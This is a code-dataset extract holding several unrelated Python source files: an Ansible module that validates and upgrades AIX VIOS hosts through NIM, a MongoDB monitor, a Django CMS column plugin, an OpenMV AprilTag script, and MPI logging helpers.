tuples[tuple][vios_name][\"alt_disk\"] = \"\" # String: \n # tuples[tuple][vios_name][\"user_res\"] = [] # Liste of resource name\n # tuples[tuple][vios_name][\"status\"] = \"\" # String: status to follow installation steps\n # tuples[tuple][vios_name][\"start_time\"] = 0 # Integer: viosupgrade start time from epoch\n # tuples[tuple][vios_name][\"loop_time\"] = 0 # Integer: viosupgrade start time from epoch\n\n upgrade_status = {} # the key is the tuple string ex: \"vios1 vios2\"\n for tuple_key in all_targets:\n tuple = {}\n vioses = tuple_key.split()\n msg = \"\"\n cluster_id = \"\"\n\n if not (vios_status is None):\n if len(vioses) == 1 and vioses[0] in vios_status\\\n and vios_status[vioses[0]] != 'SUCCESS-HC'\\\n and ios_status[vioses[0]] != 'SUCCESS-ALTDC':\n OUTPUT.append(\" {} vios skiped ({})\"\n .format(vioses[0], vios_status[vioses[0]]))\n logging.warn(\"{} vios skiped ({})\"\n .format(vioses[0], vios_status[vioses[0]]))\n upgrade_status[tuple_key] = vios_status[vioses[0]]\n continue\n if len(vioses) == 2:\n key1 = vioses[0] + \"-\" + vioses[1]\n key2 = vioses[1] + \"-\" + vioses[0]\n if key1 in vios_status.keys()\\\n and vios_status[key1] != 'SUCCESS-HC'\\\n and vios_status[key1] != 'SUCCESS-ALTDC':\n OUTPUT.append(\" {} vioses skiped ({})\"\n .format(tuple_key, vios_status[key1]))\n logging.warn(\"{} vioses skiped ({})\"\n .format(tuple_key, vios_status[key1]))\n upgrade_status[tuple_key] = vios_status[key1]\n continue\n if key2 in vios_status.keys()\\\n and vios_status[key2] != 'SUCCESS-HC'\\\n and vios_status[key2] != 'SUCCESS-ALTDC':\n OUTPUT.append(\" {} vioses skiped ({})\"\n .format(tuple_key, vios_status[key2]))\n logging.warn(\"{} vioses skiped ({})\"\n .format(tuple_key, vios_status[key2]))\n vios_status[key1] = vios_status[key2]\n upgrade_status[tuple_key] = vios_status[key2]\n continue\n else:\n OUTPUT.append(\" {} vioses skiped (no previous status found)\"\n .format(key1))\n logging.warn(\"{} vioses skiped (no previous status found)\"\n .format(key1))\n upgrade_status[tuple_key] = \"FAILURE-NO-PREV-STATUS\"\n\n for vios_name in vioses:\n msg = \"\"\n vios = {}\n vios[\"name\"] = vios_name\n vios[\"status\"] = READY\n vios[\"altinst_rootvg\"] = \"\"\n vios[\"rootvg\"] = \"\"\n vios[\"alt_disk\"] = \"\"\n vios[\"cluster_id\"] = \"\"\n vios[\"host_name\"] = \"\"\n vios[\"ip\"] = \"\"\n vios[\"interface\"] = \"\"\n vios[\"interface_type\"] = \"\"\n vios[\"cluster_status\"] = \"\"\n vios[\"skip\"] = False\n vios[\"level\"] = \"\"\n vios[\"start_time\"] = 0\n vios[\"loop_time\"] = 0\n vios[\"free_pv\"] = {}\n tuple[vios_name] = vios\n\n if vios_name not in NIM_NODE['nim_vios']:\n msg = \"vios: {} is not a nim client.\".format(vios_name)\n upgrade_status[tuple_key] = \"UNKNOWN-NIM-CLIENT\"\n if vios_name in all_vioses:\n msg = \"vios: {} is already in the list of targets.\"\\\n .format(vios_name)\n upgrade_status[tuple_key] = \"DUPLICATE-VIOS\"\n if msg:\n vios[\"status\"] = upgrade_status[tuple_key]\n break # vios loop\n\n cluster_id = \"\"\n vios[\"host_name\"] = NIM_NODE['nim_vios'][vios_name][\"vios_ip\"]\n # get dominized host_name and ip @ of the vios\n cmd = 'LC_ALL=C /bin/host {}'.format(vios[\"host_name\"])\n (ret, std_out, std_err) = exec_cmd(cmd, MODULE, False, True, True)\n if ret != 0:\n msg = 'skip target: {}, cannot get {} ip address.'\\\n .format(tuple_key, vios_name)\n break # vios loop\n else:\n # parse stdout\n for line in std_out.split('\\n'):\n line = line.strip()\n match_key = re.match(r\"^(\\S+)\\s+\\S+\\s+(\\d+.\\d+.\\d+.\\d+)$\", line)\n if match_key:\n vios[\"ip\"] = match_key.group(2)\n rootvg_size = 0\n cmd = ['/usr/lpp/bos.sysmgt/nim/methods/c_rsh', vios[\"host_name\"],\n '\"LC_ALL=C /etc/lsattr -El vioscluster0; /usr/bin/netstat -in;'\n ' /usr/sbin/lsdev -c adapter -t sea -s pseudo -F name:description;'\n ' /usr/ios/cli/ioscli lspv; /usr/ios/cli/ioscli ioslevel;'\n ' /usr/ios/cli/ioscli lspv -free;'\n ' /usr/ios/cli/ioscli cluster -status -field cluster_state\"']\n (ret, std_out, std_err) = exec_cmd(cmd, MODULE)\n # check vios connectivity\n if ret != 0:\n msg = 'skip target: {}, cannot reach {} with c_rsh.'\\\n .format(tuple_key, vios_name)\n break # vios loop\n else:\n # parse std_out and get clusterID, altinst_rootvg,\n # vios version, free pv, rootvg size\n for line in std_out.split('\\n'):\n line = line.strip()\n\n # search cluster_id\n if vios[\"cluster_id\"] == \"\":\n match_key = re.match(r\"^cluster_id\\s+(\\S+).*\", line)\n if match_key:\n cluster_id = match_key.group(1)\n vios[\"cluster_id\"] = cluster_id\n if cluster_id in all_cluster_ids:\n msg = '{}: an other node is allready belonginng'\\\n 'to the cluster with ID: {}.'.format(vios_name, cluster_id)\n break # parse std_out loop\n if len(vioses) > 1\\\n and vios[\"cluster_id\"] != tuple[vioses[0]][\"cluster_id\"]:\n msg = '{}: vioses belong to different cluster\"'.format(tuple_key)\n break # parse std_out loop\n continue # next line\n\n # search vios hsot interface\n if vios[\"interface\"] == \"\":\n match_key = re.match(r\"^(\\S+)\\s+\\d+\\s+\\S+\\s+(\\d+.\\d+.\\d+.\\d+)\\s+.*\", line)\n if match_key and match_key.group(2) == vios[\"ip\"]:\n interface = match_key.group(1)\n vios[\"interface\"] = interface.replace(\"en\", \"ent\")\n continue # next line\n # search SEA adapter\n if vios[\"interface_type\"] == \"\":\n match_key = re.match(r\"^(\\S+):Shared Ethernet Adapter\", line)\n if match_key and match_key.group(1) == vios[\"interface\"]:\n vios[\"interface_type\"] = \"SEA\"\n continue # next line\n\n # search altinst_rootvg and rootvg disk name\n if vios[\"altinst_rootvg\"] == \"\" or vios[\"rootvg\"] == \"\":\n match_key = re.match(r\"^(\\S+)\\s+(\\S+)\\s+(\\S+).*\", line)\n if match_key and match_key.group(3) == \"altinst_rootvg\":\n vios[\"altinst_rootvg\"] = match_key.group(1)\n vios[\"skip\"] = True\n continue # next line\n elif match_key and match_key.group(3) == \"rootvg\":\n if vios[\"interface_type\"] == \"\":\n vios[\"interface_type\"] = \"OTHER\" # end of search SEA section\n vios[\"rootvg\"] = match_key.group(1)\n continue # next line\n\n # search vios level\n if vios[\"level\"] == \"\":\n match_key = re.match(r\"^(\\d+.\\d+.\\d+.\\d+)$\", line)\n if match_key:\n if match_key.group(1) >= REQUIRED_IOSLEVEL:\n vios[\"level\"] = match_key.group(1)\n else:\n msg = '{} ioslevel is {}, '\\\n 'the minimum required is {}'\\\n .format(vios_name, match_key.group(1), REQUIRED_IOSLEVEL)\n break # parse std_out loop\n continue # next line\n\n # search free pv\n match_key = re.match(r\"^(\\S+)\\s+(\\S+)\\s+(\\d+)$\", line)\n if match_key:\n vios[\"free_pv\"][match_key.group(1)] = int(match_key.group(3), 10)\n continue # next line\n\n # get cluster status\n match_key = re.match(r\"^Cluster\\s+State:\\s+(\\S+)$\", line)\n if match_key:\n vios[\"cluster_status\"] = match_key.group(1)\n continue # next line\n elif line == \"Cluster does not exist.\":\n vios[\"cluster_status\"] = \"UNKOWN\"\n continue # next line\n # end annalysis of command output\n\n if vios[\"cluster_id\"] and vios[\"cluster_status\"] != \"OK\":\n msg = '{}, the cluster is not in the correct state to be upgraded.'\\\n .format(tuple_key)\n if msg:\n break # vios loop\n\n cmd = ['/usr/lpp/bos.sysmgt/nim/methods/c_rsh', vios[\"host_name\"],\n '\"LC_ALL=C /usr/sbin/lqueryvg -p {} -At\"'.format(vios[\"rootvg\"])]\n (ret, std_out, std_err) = exec_cmd(cmd, MODULE)\n # check vios connectivity\n if ret != 0:\n msg = 'skip target: {}, cannot reach {} with c_rsh.'\\\n .format(tuple_key, vios_name)\n break # vios loop\n else:\n total_pps = 0\n free_pps = 0\n pp_size = 0\n for line in std_out.split('\\n'):\n line = line.strip()\n # search rootvg size\n match_key = re.match(r\"^PP Size:\\s+(\\d+).*\", line)\n if match_key:\n pp_size = int(match_key.group(1))\n match_key = re.match(r\"^Total PPs:\\s+(\\S+).*\", line)\n if match_key:\n total_pps = int(match_key.group(1))\n match_key = re.match(r\"^Free PPs:\\s+(\\S+).*\", line)\n if match_key:\n free_pps = int(match_key.group(1))\n if pp_size == 0 or total_pps == 0:\n msg = \"Program Error\"\n else:\n # root vg size in Megabytes\n rootvg_size = (total_pps - free_pps) * (2 ** (pp_size - 20)) # in Megabytes\n\n if msg:\n vios[\"status\"] = REJECTED\n break # vios loop\n\n force_install = False # default value\n disks = \"\"\n action = \"\"\n mksysb = \"\"\n vios[\"user_res\"] = []\n if vios_name in force.keys():\n force_install = force[vios_name]\n elif \"all_vios\" in force.keys():\n force_install = force[\"all_vios\"]\n\n if vios_name in ios_mksysb.keys():\n mksysb = ios_mksysb[vios_name]\n elif \"all_vios\" in ios_mksysb.keys():\n mksysb = ios_mksysb[\"all_vios\"]\n else:\n msg = '{}: no ios_mksysb property specified.'\\\n .format(vios_name)\n break # vios loop\n vios[\"ios_mksysb\"] = mksysb\n if mksysb not in mksysb_htab.keys():\n msg = '{}: The specified ios_mksysb: {} resource does not exist'\\\n .format(vios_name, mksysb)\n break # vios loop\n elif mksysb_htab[mksysb][\"ioslevel\"] < \"3.1.0.0\":\n msg = '{}: the ios_mksysb level: {} {}, is insufficient.'\\\n ' The minimum level is 3.1.0.0'\\\n .format(vios_name, mksysb, mksysb_htab[mksysb][\"ioslevel\"])\n break # vios loop\n elif mksysb_htab[mksysb][\"ioslevel\"] < vios[\"level\"] and not force_install:\n msg = '{}: the ios_mksysb level {} {} should be greater than vios level {}.'\\\n .format(vios_name, mksysb, mksysb_htab[mksysb][\"ioslevel\"], vios[\"level\"])\n break # vios loop\n elif mksysb_htab[mksysb][\"ioslevel\"] == vios[\"level\"] and not force_install:\n msg = '{}: the ios_mksysb level {} {} should be greater than vios level {}.'\\\n .format(vios_name, mksysb, mksysb_htab[mksysb][\"ioslevel\"], vios[\"level\"])\n break # vios loop\n if vios_name in actions.keys():\n action = actions[vios_name]\n elif \"all_vios\" in actions.keys():\n action = actions[\"all_vios\"]\n else:\n msg = '{}: atcion property must be specified.'\\\n .format(vios_name)\n break # vios loop\n vios[\"action\"] = action\n if action != \"bosinst\" and action != \"altdisk\":\n msg = '{}: action type should be bosinst or altdisk.'\\\n .format(vios_name)\n break # vios loop\n\n # a bosinst installation type needs a spot resource.\n if action == 'bosinst':\n if \"spot\" in mksysb_htab[mksysb].keys():\n vios[\"spot\"] = mksysb_htab[mksysb][\"spot\"]\n else:\n msg = '{}: There is no defined spot for ios_mksysb '\\\n 'resource: {}, the bosinst installation required one.'\\\n .format(vios_name, mksysb)\n break # vios loop\n # an aldisk installation requires that the ip interface is configured on a non SEA\n elif vios[\"interface_type\"] == \"SEA\":\n msg = '{}: altdisk method is not supported on a VIOS defined with SEA interface.'\\\n .format(vios_name)\n break # vios loop\n res_list = []\n if vios_name in user_res.keys():\n res_list = user_res[vios_name].replace(':', ' ').replace(',', ' ').split()\n if \"all_vios\" in user_res.keys():\n res_list.extend(user_res[\"all_vios\"].replace(':', ' ').replace(',', ' ').split())\n res_list = list(set(res_list))\n vios[\"user_res\"] = res_list\n for res in res_list:\n if res not in nim_user_res.keys():\n msg = '{}: the resource {} does not exist or is not '\\\n 'an authorized nim resource.'\\\n .format(vios_name, res)\n break\n if action == 'altdisk' and nim_user_res[res] == \"file_res\":\n msg = '{}: the resource {} of type file_res is not '\\\n 'supported for altdisk type installation.'\\\n .format(vios_name, res)\n logging.warning(msg)\n if msg:\n break # vios loop\n\n if vios_name in alt_disk.keys():\n disks = alt_disk[vios_name].strip()\n elif \"all_vios\" in alt_disk.keys():\n disks = alt_disk[\"all_vios\"].strip()\n if disks:\n disks = disks.replace(':', ' ').replace(',', ' ').strip()\n vios[\"alt_disk\"] = disks\n if not disks and action == 'altdisk':\n msg = '{}: No alt_disk property is specified.'\\\n .format(vios_name)\n break # vios loop\n elif not disks:\n if not vios[\"altinst_rootvg\"]:\n msg = '{}: The bosinst operation requires an altinst_rootvg.'\\\n 'Create one or add the alt_disk property for this node.'\\\n .format(vios_name)\n break # vios loop\n else:\n vios[\"skip\"] = True\n\n # Reject vios and tuple if altinst_rootvg already exists\n # and alt_disk property is specified\n elif disks and vios[\"altinst_rootvg\"]:\n msg = '{}: altinst_rootvg already exist, rename it.'.format(vios_name)\n if action == 'bosinst':\n msg += ' Or remove the alt_disk property.'\n\n # test if alt_disks are free.\n # test the total size of alt_disks is enhougth for installation or clonne rootvg\n elif disks:\n d_lsit = disks.split()\n total_size = 0\n for disk in d_lsit:\n if disk in vios[\"free_pv\"].keys():\n total_size += vios[\"free_pv\"][disk]\n else:\n msg = '{}: the specified disk {} is not free'\\\n .format(vios_name, disk)\n break # test disk loop\n if msg:\n break # vios loop\n if total_size < 30720 and action == \"altdisk\":\n msg = '{}: The total size of alternate disk(s) {}: {} '\\\n 'is less than 30G. Choose disk(s) with adequate size.'\\\n .format(vios_name, disks, total_size)\n elif action == 'bosinst' and total_size < rootvg_size:\n msg = '{}: The total size of alternate disk(s) {}: {} '\\\n 'is less than the actual rootvg size {}.'\\\n 'Choose disk(s) with adequate size.'\\\n .format(vios_name, disks, total_size, rootvg_size)\n if msg:\n break # vios loop\n vios[\"skip\"] = False\n # end management disk size\n # end vios loop\n if msg:\n logging.warning(msg)\n OUTPUT.append(msg)\n msg = \"Then the \\\"{}\\\" target will not be selected for upgrade operation\"\\\n .format(tuple_key)\n logging.warning(msg)\n OUTPUT.append(msg)\n logging.debug('Rejected vios tuple: {}: {}'.format(tuple_key, tuple))\n vios[\"status\"] = REJECTED\n upgrade_status[tuple_key] = REJECTED\n else:\n all_vioses.extend(vioses)\n upgrade_status[tuple_key] = DONE\n for vios_name in vioses:\n if tuple[vios_name][\"status\"] == READY:\n upgrade_status[tuple_key] = READY\n tuples[tuple_key] = tuple\n if cluster_id:\n all_cluster_ids.append(cluster_id)\n break\n # end tuple loop\n\n logging.debug('Remaining TARGETS={}'.format(tuples))\n\n MODULE.targets = all_targets\n OUTPUT.append('Remaining Targets list:{}'.format(tuples.keys()))\n\n if len(tuples.keys()) == 0:\n msg = 'All targets have been rejected. It remains no thing to do!'\n OUTPUT.append(msg)\n if VERBOSITY == 3:\n MODULE.exit_json(\n changed=False,\n msg=msg,\n nim_node=NIM_NODE,\n targets=MODULE.targets,\n debug_output=DEBUG_DATA,\n output=OUTPUT,\n status=upgrade_status)\n else:\n MODULE.exit_json(\n changed=False,\n msg=msg,\n output=OUTPUT,\n status=upgrade_status)\n\n nb_error = viosupgrade(MODULE, tuples, upgrade_status)\n\n # Prints vios status for each targets\n for tuple_key in upgrade_status:\n status = upgrade_status[tuple_key]\n msg = 'VIOSUpgrade operation on target: \"{}\" end with status: {}.'\\\n .format(tuple_key, status)\n OUTPUT.append(msg)\n logging.info(msg)\n if status == DONE or status == ERROR:\n for vios_name in tuple_key.split():\n msg = 'VIOSUpgrade {} operation status on \"{}\": {}.'\\\n .format(tuples[tuple_key][vios_name][\"action\"], vios_name,\n tuples[tuple_key][vios_name][\"status\"])\n logging.info(msg)\n OUTPUT.append(msg)\n\n # Prints a global result statement\n if nb_error == 0:\n msg = 'NIM VIOSUpgrade operation completed successfully'\n OUTPUT.append(msg)\n logging.info(msg)\n else:\n msg = 'VIOSUpgrade operation failed: {} errors'.format(nb_error)\n OUTPUT.append(msg)\n logging.error(msg)\n\n # # =========================================================================\n # # Exit\n # # =========================================================================\n if nb_error == 0:\n if VERBOSITY == 3:\n MODULE.exit_json(\n changed=CHANGED,\n msg=msg,\n nim_node=NIM_NODE,\n targets=MODULE.targets,\n debug_output=DEBUG_DATA,\n output=OUTPUT,\n status=upgrade_status)\n else:\n MODULE.exit_json(\n changed=CHANGED,\n msg=msg,\n targets=MODULE.targets,\n output=OUTPUT,\n status=upgrade_status)\n else:\n MODULE.fail_json(\n changed=CHANGED,\n msg=msg,\n targets=MODULE.targets,\n debug_output=DEBUG_DATA,\n output=OUTPUT,\n status=upgrade_status)\n","sub_path":"library/aix_nim_viosupgrade.py","file_name":"aix_nim_viosupgrade.py","file_ext":"py","file_size_in_byte":49206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"395290888","text":"import pymongo\n\nimport time\nfrom jianwei.pipelines import MongoPipeline\n\nmonitor = MongoPipeline('mongodb://localhost:27017', 'jianwei')\nmonitor_db = monitor.db\nnewest_name = max(monitor_db.list_collection_names())\nmongo_clt = monitor.db[newest_name]\nstart_time = time.time()\nwhile True:\n used_time = time.time() - start_time\n\n print('Time: %6.2f min, Documents stacked: %6d in collection %s'\n % (used_time/60, mongo_clt.count_documents({}), mongo_clt.name))\n time.sleep(5)\n\n '''After Main Procedure starts, then start it, for waiting reading the MongoDB'''\n\n","sub_path":"files/monitor_spider.py","file_name":"monitor_spider.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"9439433","text":"from __future__ import unicode_literals\n\nfrom django import forms\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom cms.models import CMSPlugin\nfrom cms.plugin_pool import plugin_pool\nfrom cms.plugin_base import CMSPluginBase\n\nfrom sections.cms_plugins import WrapPluginForm, WrapPlugin\nfrom sections.models import Wrap\nfrom baseplugin.utils import get_indicator_hidden\n\nfrom . import conf\nfrom .models import Column\n\n\nclass ColumnPluginForm(forms.ModelForm):\n class Meta:\n model = Column\n fields = conf.COLUMN_FIELDS\n widgets = {\n 'bg_color': forms.Select(\n choices=conf.COLUMN_BACKGROUND_COLORS\n ),\n 'css_class': forms.Select(\n choices=conf.COLUMN_CSS_CLASSES\n ),\n 'height': forms.Select(\n choices=conf.COLUMN_HEIGHTS\n ),\n 'width': forms.RadioSelect(\n choices=conf.COLUMN_WIDTHS\n ),\n }\n\n\nclass ColumnPlugin(CMSPluginBase):\n allow_children = True\n child_classes = conf.COLUMN_PLUGINS\n exclude = conf.COLUMN_EXCLUDE\n fieldsets = conf.COLUMN_FIELDSETS\n form = ColumnPluginForm\n model = Column\n module = _('layout')\n name = _('column')\n render_template = 'cms/plugins/columns_column.html'\n\n def render(self, context, instance, placeholder):\n request = context['request']\n context.update({\n 'object': instance,\n 'placeholder':placeholder,\n 'indicator_hidden': get_indicator_hidden(request, instance),\n })\n return context\n\nplugin_pool.register_plugin(ColumnPlugin)\n","sub_path":"columns/cms_plugins.py","file_name":"cms_plugins.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"645687645","text":"# AprilTags Example\n#\n# This example shows the power of the OpenMV Cam to detect April Tags\n# on the OpenMV Cam M7. The M4 versions cannot detect April Tags.\n\n\nimport machine, gc,utime\nfrom pyb import LED\nimport sensor, image, time, math\nimport LPF2Class\n\nsensor.reset()\nsensor.set_pixformat(sensor.RGB565)\nsensor.set_framesize(sensor.QQVGA) # we run out of memory if the resolution is much bigger...\nsensor.skip_frames(time = 2000)\nsensor.set_auto_gain(False) # must turn this off to prevent image washout...\nsensor.set_auto_whitebal(False) # must turn this off to prevent image washout...\n\nprint(\"made it here\")\n\n# Note! Unlike find_qrcodes the find_apriltags method does not need lens correction on the image to work.\n\n# The apriltag code supports up to 6 tag families which can be processed at the same time.\n# Returned tag objects will have their tag family and id within the tag family.\n\ntag_families = 0\ntag_families |= image.TAG16H5 # comment out to disable this family\ntag_families |= image.TAG25H7 # comment out to disable this family\ntag_families |= image.TAG25H9 # comment out to disable this family\ntag_families |= image.TAG36H10 # comment out to disable this family\ntag_families |= image.TAG36H11 # comment out to disable this family (default family)\ntag_families |= image.ARTOOLKIT # comment out to disable this family\n\n# What's the difference between tag families? Well, for example, the TAG16H5 family is effectively\n# a 4x4 square tag. So, this means it can be seen at a longer distance than a TAG36H11 tag which\n# is a 6x6 square tag. However, the lower H value (H5 versus H11) means that the false positve\n# rate for the 4x4 tag is much, much, much, higher than the 6x6 tag. So, unless you have a\n# reason to use the other tags families just use TAG36H11 which is the default family.\n\ndef family_name(tag):\n if(tag.family() == image.TAG16H5):\n return \"TAG16H5\"\n if(tag.family() == image.TAG25H7):\n return \"TAG25H7\"\n if(tag.family() == image.TAG25H9):\n return \"TAG25H9\"\n if(tag.family() == image.TAG36H10):\n return \"TAG36H10\"\n if(tag.family() == image.TAG36H11):\n return \"TAG36H11\"\n if(tag.family() == image.ARTOOLKIT):\n return \"ARTOOLKIT\"\n\n\nprint(\"hi\")\nred_led=LED(1)\nred_led.on()\nlpf2 = LPF2Class.LPF2(3, 'P4', 'P5') # OpenMV\nprint(\"ugh\")\nlpf2.initialize()\n\nprint(\"initialized\")\n\nwhile True:\n if not lpf2.connected:\n red_led.on()\n utime.sleep(1)\n lpf2.initialize()\n\n else:\n red_led.off()\n while lpf2.connected:\n gc.collect()\n img = sensor.snapshot()\n for tag in img.find_apriltags(families=tag_families): # defaults to TAG36H11 without \"families\".\n img.draw_rectangle(tag.rect(), color = (255, 0, 0))\n img.draw_cross(tag.cx(), tag.cy(), color = (0, 255, 0))\n print_args = (family_name(tag), tag.id(), (180 * tag.rotation()) / math.pi)\n print(\"APRIL TAG \" + str(tag.id()))\n lpf2.send_value(int(tag.id()))\n utime.sleep(0.1)\n","sub_path":"​SPIKE Prime Backpacks/OpenMVCamera/AprilTagDetection/PythonIDE/AprilTags.py","file_name":"AprilTags.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"98689984","text":"import sys\nimport logging\nfrom mpi4py import MPI\n\ndef err_out_screen(err_msg):\n \"\"\"\n Generic routine to exit the program gracefully. This specific error function does not log\n error messages to the log file, but simply prints them out to the screen. This is function\n is designed specifically for early in the program execution where a log file hasn't been\n established yet.\n Logan Karsten - National Center for Atmospheric Research, karsten@ucar.edu\n \"\"\"\n\n err_msg_out = 'ERROR: ' + err_msg\n print(err_msg_out)\n sys.exit(1)\n\ndef err_out_screen_para(err_msg,MpiConfig):\n \"\"\"\n Generic function for printing an error message to the screen and aborting MPI.\n This should only be called if logging cannot occur and an abrupt end the program\n is neded.\n :param err_msg:\n :param MpiConfig:\n :return:\n \"\"\"\n err_msg_out = 'ERROR: RANK - ' + str(MpiConfig.rank) + ' : ' + err_msg\n print(err_msg_out)\n MpiConfig.comm.Abort()\n sys.exit(1)\n\ndef check_program_status(ConfigOptions,MpiConfig):\n \"\"\"\n Generic function to check the err statuses for each processor in the program.\n If any flags come back, gracefully exit the program.\n :param ConfigOptions:\n :param MpiConfig:\n :return:\n \"\"\"\n # Sync up processors to ensure everyone is on the same page.\n MpiConfig.comm.barrier()\n\n # Collect values from each processor.\n data = MpiConfig.comm.gather(ConfigOptions.errFlag, root=0)\n if MpiConfig.rank == 0:\n for i in range(MpiConfig.size):\n if data[i] != 0:\n MpiConfig.comm.Abort()\n sys.exit(1)\n else:\n assert data is None\n\n # Sync up processors.\n MpiConfig.comm.barrier()\n\ndef init_log(ConfigOptions,MpiConfig):\n \"\"\"\n Function for initializing log file for individual forecast cycles. Each\n log file is unique to the instant the program was initialized.\n :param ConfigOptions:\n :return:\n \"\"\"\n try:\n logObj = logging.getLogger('logForcing')\n except:\n ConfigOptions.errMsg = \"Unable to create logging object \" \\\n \"for: \" + ConfigOptions.logFile\n err_out_screen_para(ConfigOptions.errMsg,MpiConfig)\n try:\n formatter = logging.Formatter('[%(asctime)s]: %(levelname)s '\n '- %(message)s', '%m/%d %H:%M:%S')\n except:\n ConfigOptions.errMsg = \"Unable to establish formatting for logger.\"\n err_out_screen_para(ConfigOptions.errMsg,MpiConfig)\n try:\n ConfigOptions.logHandle = logging.FileHandler(ConfigOptions.logFile,mode='a')\n except:\n ConfigOptions.errMsg = \"Unable to create log file handle for: \" + \\\n ConfigOptions.logFile\n err_out_screen_para(ConfigOptions.errMsg,MpiConfig)\n try:\n ConfigOptions.logHandle.setFormatter(formatter)\n except:\n ConfigOptions.errMsg = \"Unable to set formatting for: \" + \\\n ConfigOptions.logFile\n err_out_screen_para(ConfigOptions.errMsg,MpiConfig)\n try:\n logObj.addHandler(ConfigOptions.logHandle)\n except:\n ConfigOptions.errMsg = \"ERROR: Unable to add log handler for: \" + \\\n ConfigOptions.logFile\n err_out_screen_para(ConfigOptions.errMsg,MpiConfig)\n\ndef err_out(ConfigOptions):\n \"\"\"\n Function to error out after an error message has been logged for a\n forecast cycle. We will exit with a non-zero exit status.\n :param ConfigOptions:\n :return:\n \"\"\"\n try:\n logObj = logging.getLogger('logForcing')\n except:\n ConfigOptions.errMsg = \"Unable to obtain a logger object for: \" + \\\n ConfigOptions.logFile\n raise Exception()\n try:\n logObj.setLevel(logging.ERROR)\n except:\n ConfigOptions.errMsg = \"Unable to set ERROR logger level for: \" + \\\n ConfigOptions.logFile\n raise Exception()\n try:\n logObj.error(ConfigOptions.errMsg)\n except:\n ConfigOptions.errMsg = \"Unable to write error message to: \" + \\\n ConfigOptions.logFile\n raise Exception()\n MPI.Finalize()\n sys.exit(1)\n\ndef log_error(ConfigOptions,MpiConfig):\n \"\"\"\n Function to log an error message to the log file.\n :param ConfigOptions:\n :param MpiConfig:\n :return:\n \"\"\"\n try:\n logObj = logging.getLogger('logForcing')\n except:\n err_out_screen_para(('Unable to obtain logger object on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n try:\n logObj.setLevel(logging.ERROR)\n except:\n err_out_screen_para(('Unable to set ERROR logger level on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n try:\n logObj.error(\"RANK: \" + str(MpiConfig.rank) + \" - \" + ConfigOptions.errMsg)\n except:\n err_out_screen_para(('Unable to write ERROR message on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n ConfigOptions.errFlag = 1\n\ndef log_critical(ConfigOptions,MpiConfig):\n \"\"\"\n Function for logging an error message without exiting without a\n non-zero exit status.\n :param ConfigOptions:\n :return:\n \"\"\"\n try:\n logObj = logging.getLogger('logForcing')\n except:\n err_out_screen_para(('Unable to obtain logger object on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n try:\n logObj.setLevel(logging.CRITICAL)\n except:\n err_out_screen_para(('Unable to set CRITICAL logger level on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n try:\n logObj.critical(\"RANK: \" + str(MpiConfig.rank) + \" - \" + ConfigOptions.errMsg)\n except:\n err_out_screen_para(('Unable to write CRITICAL message on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n ConfigOptions.errFlag = 1\n\ndef log_warning(ConfigOptions,MpiConfig):\n \"\"\"\n Function to log warning messages to the log file.\n :param ConfigOptions:\n :return:\n \"\"\"\n try:\n logObj = logging.getLogger('logForcing')\n except:\n err_out_screen_para(('Unable to obtain logger object on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n try:\n logObj.setLevel(logging.WARNING)\n except:\n err_out_screen_para(('Unable to set WARNING logger level on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n try:\n logObj.warning(\"RANK: \" + str(MpiConfig.rank) + \" - \" + ConfigOptions.statusMsg)\n except:\n err_out_screen_para(('Unable to write WARNING message on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n\ndef log_msg(ConfigOptions,MpiConfig):\n \"\"\"\n Function to log INFO messages to a specified log file.\n :param ConfigOptions:\n :return:\n \"\"\"\n try:\n logObj = logging.getLogger('logForcing')\n except:\n err_out_screen_para(('Unable to obtain logger object on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n try:\n logObj.setLevel(logging.INFO)\n except:\n err_out_screen_para(('Unable to set INFO logger level on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n try:\n logObj.info(\"RANK: \" + str(MpiConfig.rank) + \" - \" + ConfigOptions.statusMsg)\n except:\n err_out_screen_para(('Unable to write INFO message on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile),MpiConfig)\n\ndef close_log(ConfigOptions,MpiConfig):\n \"\"\"\n Function for closing a log file.\n :param ConfigOptions:\n :return:\n \"\"\"\n try:\n logObj = logging.getLogger('logForcing')\n except:\n err_out_screen_para(('Unable to obtain logger object on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile), MpiConfig)\n try:\n logObj.removeHandler(ConfigOptions.logHandle)\n except:\n err_out_screen_para(('Unable to remove logging file handle on RANK: ' + str(MpiConfig.rank) +\n ' for log file: ' + ConfigOptions.logFile), MpiConfig)\n try:\n ConfigOptions.logHandle.close()\n except:\n err_out_screen_para(('Unable to close looging file: ' + ConfigOptions.logFile +\n ' on RANK: ' + str(MpiConfig.rank)),MpiConfig)\n ConfigOptions.logHandle = None","sub_path":"core/errMod.py","file_name":"errMod.py","file_ext":"py","file_size_in_byte":8875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"29962750","text":"\nimport os\nfrom PIL import 